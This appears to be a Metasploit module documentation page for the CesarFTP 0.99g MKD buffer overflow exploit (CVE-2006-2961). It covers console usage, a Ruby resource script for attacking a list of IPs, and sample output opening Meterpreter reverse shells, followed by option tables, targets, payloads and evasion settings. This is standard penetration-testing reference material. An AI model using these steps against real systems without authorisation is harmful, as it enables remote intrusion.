Cesar FTP 0.99g MKD Command Buffer Overflow - Metasploit


This page contains detailed information about how to use the exploit/windows/ftp/cesarftp_mkd metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cesar FTP 0.99g MKD Command Buffer Overflow
Module: exploit/windows/ftp/cesarftp_mkd
Source code: modules/exploits/windows/ftp/cesarftp_mkd.rb
Disclosure date: 2006-06-12
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: ftp
Target network port(s): 21, 2121
List of CVEs: CVE-2006-2961

This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g. You must have valid credentials to trigger this vulnerability. Also, you only get one chance, so choose your target carefully.

Module Ranking and Traits


Module Ranking:

  • average: The exploit is generally unreliable or difficult to exploit. More information about ranking can be found here.

Basic Usage


Using cesarftp_mkd against a single host

Normally, you can use exploit/windows/ftp/cesarftp_mkd this way:

msf > use exploit/windows/ftp/cesarftp_mkd
msf exploit(cesarftp_mkd) > show targets
    ... a list of targets ...
msf exploit(cesarftp_mkd) > set TARGET target-id
msf exploit(cesarftp_mkd) > show options
    ... show and set options ...
msf exploit(cesarftp_mkd) > exploit

Using cesarftp_mkd against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your cesarftp_mkd will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/windows/ftp/cesarftp_mkd")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the windows/ftp/cesarftp_mkd exploit module looks in the msfconsole:

msf6 > use exploit/windows/ftp/cesarftp_mkd

msf6 exploit(windows/ftp/cesarftp_mkd) > show info

       Name: Cesar FTP 0.99g MKD Command Buffer Overflow
     Module: exploit/windows/ftp/cesarftp_mkd
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2006-06-12

Provided by:
  MC <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Windows 2000 Pro SP4 English
  1   Windows 2000 Pro SP4 French
  2   Windows XP SP2/SP3 English
  3   Windows 2003 SP1 English

Check supported:
  Yes

Basic options:
  Name     Current Setting      Required  Description
  ----     ---------------      --------  -----------
  FTPPASS  [email protected]  no        The password for the specified username
  FTPUSER  anonymous            no        The username to authenticate as
  RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    21                   yes       The target port (TCP)

Payload information:
  Space: 250
  Avoid: 4 characters

Description:
  This module exploits a stack buffer overflow in the MKD verb in 
  CesarFTP 0.99g. You must have valid credentials to trigger this 
  vulnerability. Also, you only get one chance, so choose your target 
  carefully.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2006-2961
  OSVDB (26364)
  http://www.securityfocus.com/bid/18586
  http://secunia.com/advisories/20574/

Module Options


This is a complete list of options available in the windows/ftp/cesarftp_mkd exploit:

msf6 exploit(windows/ftp/cesarftp_mkd) > show options

Module options (exploit/windows/ftp/cesarftp_mkd):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  [email protected]  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    21                   yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 Pro SP4 English

Advanced Options


Here is a complete list of advanced options supported by the windows/ftp/cesarftp_mkd exploit:

msf6 exploit(windows/ftp/cesarftp_mkd) > show advanced

Module advanced options (exploit/windows/ftp/cesarftp_mkd):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FTPDEBUG                false            no        Whether or not to print verbose debug statements
   FTPTimeout              16               yes       The number of seconds to wait for a reply from an FTP command
   PassiveMode             false            no        Set true for extended passive (EPSV) ftp mode.
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/ftp/cesarftp_mkd module can exploit:

msf6 exploit(windows/ftp/cesarftp_mkd) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 Pro SP4 English
   1   Windows 2000 Pro SP4 French
   2   Windows XP SP2/SP3 English
   3   Windows 2003 SP1 English

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/ftp/cesarftp_mkd exploit:

msf6 exploit(windows/ftp/cesarftp_mkd) > show payloads

Compatible Payloads
===================

   #  Name                                                Disclosure Date  Rank    Check  Description
   -  ----                                                ---------------  ----    -----  -----------
   0  payload/windows/dllinject/reverse_ord_tcp                            normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   1  payload/windows/meterpreter/reverse_ord_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   2  payload/windows/patchupdllinject/reverse_ord_tcp                     normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   3  payload/windows/patchupmeterpreter/reverse_ord_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   4  payload/windows/peinject/reverse_ord_tcp                             normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   5  payload/windows/shell/reverse_ord_tcp                                normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   6  payload/windows/upexec/reverse_ord_tcp                               normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   7  payload/windows/vncinject/reverse_ord_tcp                            normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)

Evasion Options


Here is the full list of possible evasion options supported by the windows/ftp/cesarftp_mkd exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/ftp/cesarftp_mkd) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


MC

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.